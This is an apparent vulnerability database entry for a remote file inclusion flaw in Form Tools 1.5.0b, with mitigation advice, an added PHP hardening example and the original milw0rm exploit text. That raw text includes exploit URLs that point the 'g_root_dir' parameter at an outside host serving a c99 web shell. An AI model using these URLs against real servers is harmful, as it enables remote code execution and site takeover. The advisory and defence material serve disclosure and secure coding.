Vendor: Form Tools
By: RoMaNcYxHaCkEr
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: Form Tools
Affected Version From: 1.5.0b
Affected Version To: 1.5.0b
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Form tools 1.5.0b Remote File Include

The vulnerability exists in the admin_page_open.php and client_page_open.php files in the Form Tools 1.5.0b software. The vulnerability allows an attacker to include remote files by manipulating the 'g_root_dir' parameter. By exploiting this vulnerability, an attacker can execute malicious code hosted on a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software or apply a security patch if available. Additionally, it is advised to validate and sanitize user-supplied input to prevent remote file inclusion attacks.
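
The following PHP sketch is an added example, not Form Tools code or a vendor patch. It shows one way to harden the `require` lines quoted in the advisory, by taking the base directory from the server side and checking the template name against an allowlist. The function name `resolve_template`, the allowlist contents and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example, not Form Tools code: a hardened form of
//   require("$g_root_dir/global/templates/admin_nav.php");
// The base directory is fixed server-side and the file name is checked
// against an allowlist, so no request value ever reaches require.

// Hypothetical allowlist of includable templates.
const ALLOWED_TEMPLATES = ['admin_nav.php', 'client_nav.php'];

function resolve_template(string $baseDir, string $name): string
{
    // Exact-match allowlist: URLs, stream wrappers and "../" never match.
    if (!in_array($name, ALLOWED_TEMPLATES, true)) {
        throw new InvalidArgumentException('template not on allowlist');
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    // realpath() returns false when the path does not exist; the prefix
    // check catches a symlink that resolves outside the base directory.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('template not found inside base directory');
    }
    return $path;
}

// Constructed demo: a throwaway template directory standing in for
// <app root>/global/templates (in the application, use __DIR__).
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ft_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'admin_nav.php',
    '<?php echo "nav loaded\n";');

require resolve_template($base, 'admin_nav.php');   // includes the local file

// Constructed hostile value of the kind sent in g_root_dir; it is rejected
// before any filesystem or network access happens.
try {
    resolve_template($base, 'http://attacker.example.invalid/x.txt?');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

unlink($base . DIRECTORY_SEPARATOR . 'admin_nav.php');
rmdir($base);
```

As defence in depth, keep `allow_url_include` set to Off and `register_globals` disabled in php.ini, assuming the parameter reaches `$g_root_dir` through register_globals, which the advisory does not state.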

Exploit-DB raw data:

# Name : Form tools 1.5.0b Remote File Include
# Download From : http://www.formtools.org/download.php
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
============================================================================
# Vulne Code In Files admin_page_open.php & client_page_open.php In Line 3 :
<?php
    require("$g_root_dir/global/templates/admin_nav.php");
    ?>
<?php
    require("$g_root_dir/global/templates/client_nav.php");
    ?>
 

# Exploit:
www.RxH.com/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://no-hack.fr/shells/c99.txt?
And Here
www.RxH.com/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=http://no-hack.fr/shells/c99.txt?
============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
H-T TeaM (no-hack.fr)
Str0ck
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye And All My Friends
# For Contact : RxH@HotMail.iT
Best Wishes

# milw0rm.com [2007-12-14]